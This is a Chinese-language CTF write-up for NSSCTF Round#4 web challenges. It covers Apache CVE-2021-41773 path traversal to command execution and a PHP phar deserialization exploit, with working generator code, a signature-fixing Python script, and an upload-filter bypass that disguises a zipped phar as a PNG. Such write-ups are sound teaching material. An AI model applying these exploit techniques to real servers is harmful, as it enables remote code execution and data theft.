NSSCTF Round#4 Web WP
前言
整体Web题目不是很难,正适合我这个菜鸡打,也是我第一次在博客上发WP就好好写写,之前的比赛都没做出几道题所以没机会写,之后会更多地更新博客。
1zweb
这道题被非预期解了,查看文件可以直接文件包含读取flag
ez_rce
一打开页面只有It works!这几个大字,扫目录也没有收获。
查看apache版本,搜索有没有相关的漏洞,找到了一个目录穿越达到命令执行的漏洞。
刚好测试环境页面也是It works!,看来就是它了。
https://github.com/vulhub/vulhub/blob/master/httpd/CVE-2021-41773/README.zh-cn.md
bp抓包后成功命令执行
找flag在根目录
但还需要走迷宫,一共有四层(出题人,你坏事做尽
用bp自带的板块进行爆破,获取flag
1zweb(revenge)
把flag禁了之后的第一题
可以通过查看文件查看index.php以及upload.php
// index.php
<?php
class LoveNss{public $ljt;public $dky;public $cmd;public function __construct(){$this->ljt="ljt";$this->dky="dky";phpinfo();}public function __destruct(){if($this->ljt==="Misc"&&$this->dky==="Re")eval($this->cmd);}public function __wakeup(){$this->ljt="Re";$this->dky="Misc";}
}
$file=$_POST['file'];
if(isset($_POST['file'])){if (preg_match("/flag/i", $file)) {die("nonono");}echo file_get_contents($file);
}
很明显是和反序列化相关,ile_get_contents读phar文件时能能触发返序列化漏洞,所以我们只需要创建一个phar文件就可以了。
exp
<?phpunlink('phar.phar');class LoveNss{public $ljt="Misc";public $dky="Re";public $cmd="system('cat /flag');";}$a=new LoveNss();$phar = new Phar('phar.phar');$phar->setStub('<?php __HALT_COMPILER();?>');$phar->setMetadata($a);$phar->addFromString('1.txt','dky');
?>
为了绕过__wakeup将属性数量改大
签名代码进行修复
from hashlib import sha1
f = open('./phar.phar', 'rb').read() # 修改内容后的phar文件
s = f[:-28] # 获取要签名的数据
h = f[-8:] # 获取签名类型以及GBMB标识
newf = s+sha1(s).digest()+h # 数据 + 签名 + 类型 + GBMB
open('22.phar', 'wb').write(newf) # 写入新文件
然后我们再来看upload.php
<?php
if ($_FILES["file"]["error"] > 0){echo "上传异常";
}
else{$allowedExts = array("gif", "jpeg", "jpg", "png");$temp = explode(".", $_FILES["file"]["name"]);$extension = end($temp);if (($_FILES["file"]["size"] && in_array($extension, $allowedExts))){$content=file_get_contents($_FILES["file"]["tmp_name"]);$pos = strpos($content, "__HALT_COMPILER();");if(gettype($pos)==="integer"){echo "ltj一眼就发现了phar";}else{if (file_exists("./upload/" . $_FILES["file"]["name"])){echo $_FILES["file"]["name"] . " 文件已经存在";}else{$myfile = fopen("./upload/".$_FILES["file"]["name"], "w");fwrite($myfile, $content);fclose($myfile);echo "上传成功 ./upload/".$_FILES["file"]["name"];}}}else{echo "dky不喜欢这个文件 .".$extension;}
}
?>
这里对文件后后缀进行了白名单,也对phar文件内容进行了检测,伪了绕过这两点,我们可以使用phar伪协议
php文件上传+文件包含(phar伪协议)_Spaceman-911的博客-CSDN博客_phar伪协议
将文件压缩为zip文件,并把后缀改为png文件,这样文件内容和后缀白名单检测都绕过了
成功上传
然后再用phar伪协议进行读取,解压文件并改为phar.phar,获得flag
NSSCTF Round#4 Web WP相关推荐
- NSSCTF Round#8 web专项赛
文章目录 MyPage 方法一: pearcmd.php 方法二:多级连接绕过 方法三: PHP Base64 Filter 宽松解析 MyDoor Upload_gogoggo ez_node My ...
- Buuctf -web wp汇总(一)
Buuctf -web wp汇总(一):链接 Buuctf -web wp汇总(二):链接 持续更新ing~ BuuCTF平台 文章目录 BuuCTF平台 [极客大挑战 2019]EasySQL [极 ...
- 纵横杯2020 web wp
title: 纵横杯2020 web wp date: 2020-12-26 18:19:03 tags: CTF categories: 比赛 link:https://yq1ng.github.i ...
- Buuctf -web wp汇总(三)
Buuctf -web wp汇总(一):链接 Buuctf -web wp汇总(二):链接 Buuctf -web wp汇总(三):链接 文章目录 [WUSTCTF2020]朴实无华 [WUSTCTF ...
- jarvis oj(web wp)
api调用 这题是slim架构的xxe漏洞,看博客做题2333 https://www.leavesongs.com/PENETRATION/slim3-xxe.html simple injecti ...
- ISCC2021 Web WP
目录 练武 ISCC客服冲冲冲(一) 这是啥 正则匹配最后的倔强. 登录 which is the true iscc ISCC客服一号冲冲冲(二) lovely ssti 擂台 tornado ea ...
- [极客大挑战2021]web wp
极客大挑战2021 Welcome2021 F12,提示请使用WELCOME请求方法来请求此网页 burp抓包,修改请求方法,发现f1111aaaggg9.php 再次请求得到flag Dark To ...
- bugku web wp
写在前面: 简单步骤不再复现,只是再复习一下知识点,可以挖深一点. web2 F12 计算器 F12改html $get $post ? & hackbar 矛盾 很多解法 1加一个符号就行了 ...
- UNCTF2020 | Web Wp
文章目录 Web 0x01:easy_ssrf 0x02:babyeval 0x03:ezphp 0x04:easy_upload 0x05:L0vephp 0x06:easyflask 0x07:e ...
最新文章
- Java基础篇:Executor框架
- 一个搜索需求搞垮微服务
- 在《我的世界》里搭建神经网络,运行过程清晰可见,这位印度小哥开发的新玩法火了...
- hbase集群间数据迁移
- 2021年春季学期-信号与系统-第四次作业参考答案-第十小题
- python 微信爬虫_python3简单实现微信爬虫
- 那些伤害不大,侮辱性极强的瞬间
- 搜索引擎网址收录地址
- NYOJ 108 士兵杀敌(一)
- linux 冒号命令,linux 的空命令:(冒号)
- 第8部分 管理磁盘存储
- SAP UI5 应用开发教程之五十八 - 使用工厂方法在运行时动态创建不同类型的列表行项目控件试读版
- 数字三角形的显示 java
- Wi-Fi闪开,网速快 100 倍的Li-Fi要来了
- IOS多选单选相册图片
- 同网关劫持与不同网关劫持实例
- 使用template.js加载后端数据
- javascript学习笔记之document对象、表单及表单元素、脚本化cookie
- PostgreSQL 删除重复数据
- JavaScript学习总结
热门文章
- 嵌入式设计实验三:Tasket与工作队列
- The server time zone value ‘й‘ is unrecognized or represents more than one time zone
- 《游戏引擎架构》读书笔记(二)
- OpenMV零基础教程
- F005MyBatis学习笔记-MyBatis的多表关联查询
- 常用的图像质量评估方法
- AlBaath Collegiate Programming Contest (2015) 总结
- MapReduce解决乘用车辆和商用车辆的销售数据分析
- python 图片 变清晰_图片无损放大利器,把模糊图片变清晰
- NAND flash基本概念整理